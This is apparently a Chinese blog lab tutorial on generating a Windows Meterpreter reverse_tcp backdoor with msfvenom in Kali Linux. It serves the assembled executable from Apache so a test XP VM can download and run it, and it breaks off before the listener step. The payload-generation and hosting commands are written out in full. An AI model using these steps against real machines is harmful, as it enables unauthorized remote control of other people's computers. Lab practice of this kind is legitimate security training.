如何使用msfvenom生成被控端并进行远程控制

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

前言

Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具,它其实是MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控端。


一、前导练习:

  1. 查看帮助信息
    命令:msfvenom --help
    下面给出了msfvenom的几个常见的使用参数。
    Options:
    -p, --payload 指定要生成的payload( 攻击荷载)。如果需要使用自定义的payload,请使用’-‘或者stdin指定
    -f, --format 指定输出格式(可以使用 --help-formats 来获取msf支持的输出格式列表)
    -o, --out 指定存储payload的位置
    –payload-options 列举payload的标准选项
    –help-formats 查看msf支持的输出格式列表
    在这里插入图片描述
  2. 查看所有可以使用的攻击模块
    命令:msfvenom -l payloads在这里插入图片描述
  3. 筛选出使用reverse_tcp的模块
    命令:msfvenom -l payloads | grep reverse_tcp在这里插入图片描述
  4. 使用–list-options选项查看攻击载荷需要设置的参数
    命令:msfvenom --list-options -p 【使用reverse_tcp的模块】
    在这里插入图片描述

二、6.4 如何使用msfvenom生成被控端并进行远程控制

(一)6.4.1 生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:
测试用windows系统(WinXPenSP)的IP: 192.168.163.132
在这里插入图片描述
虚拟机Kali Linux 2的IP: 192.168.163.130
在这里插入图片描述

步骤一:生成Windows操作系统下的被控端并放入目标靶机运行

options(选项)
-p 指定要生成的攻击荷载(payload)
-f 输出格式(format)
-o 输出(out)存储payload的位置
方法一(教材): 将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.130 lport=5000 -f exe -o /var/pavload.exe

在这里插入图片描述
方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。
(1)将被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)下

ls /var
cp /var/payload.exe /var/www/html/winpayload.exe
ls /var/www/html

在这里插入图片描述
(2)检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述
(3)启动apache2服务systemctl start apache2.service
在这里插入图片描述
(4)到靶机WinXPenSP3中用浏览器下载并运行
在这里插入图片描述

步骤二 :启

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值